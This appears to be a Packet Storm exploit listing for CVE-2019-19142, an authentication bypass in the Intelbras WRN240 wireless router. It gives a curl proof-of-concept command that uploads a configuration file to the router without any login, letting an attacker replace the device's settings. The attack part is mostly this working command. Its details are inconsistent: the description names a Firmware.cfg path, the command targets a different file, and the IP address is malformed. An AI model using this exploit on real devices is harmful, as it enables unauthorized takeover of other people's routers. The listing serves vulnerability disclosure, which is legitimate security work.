Lucene search

K
packetstormElber TavaresPACKETSTORM:156589
HistoryMar 02, 2020 - 12:00 a.m.

Intelbras Wireless N 150Mbps WRN240 Authentication Bypass

2020-03-0200:00:00
Elber Tavares
packetstormsecurity.com
91

0.015 Low

EPSS

Percentile

86.8%

`# Exploit Title: Intelbras Wireless N 150Mbps WRN240 - Authentication Bypass (Config Upload)  
# Date: 2019-11-20  
# Exploit Author: Elber Tavares  
# Vendor Homepage: https://www.intelbras.com/  
# Software Link: http://en.intelbras.com.br/node/1033  
# Version: Intelbras Wireless N 150Mbps - WRN240  
# Tested on: linux, windows  
# CVE: CVE-2019-19142  
  
Intelbras WRN240 devices do not require authentication to replace the  
firmware via a POST request to the incoming/Firmware.cfg URI.  
  
REFS:  
https://fireshellsecurity.team/hack-n-routers/  
https://github.com/ElberTavares/routers-exploit/  
  
  
Poc:  
curl -i -X POST -H "Content-Type: multipart/form-data" -H "Referer:  
http://192.168.0.1/userRpm/BakNRestoreRpm.htm" -F [email protected]  
http://192.1680.1/incoming/RouterBakCfgUpload.cfg  
`

0.015 Low

EPSS

Percentile

86.8%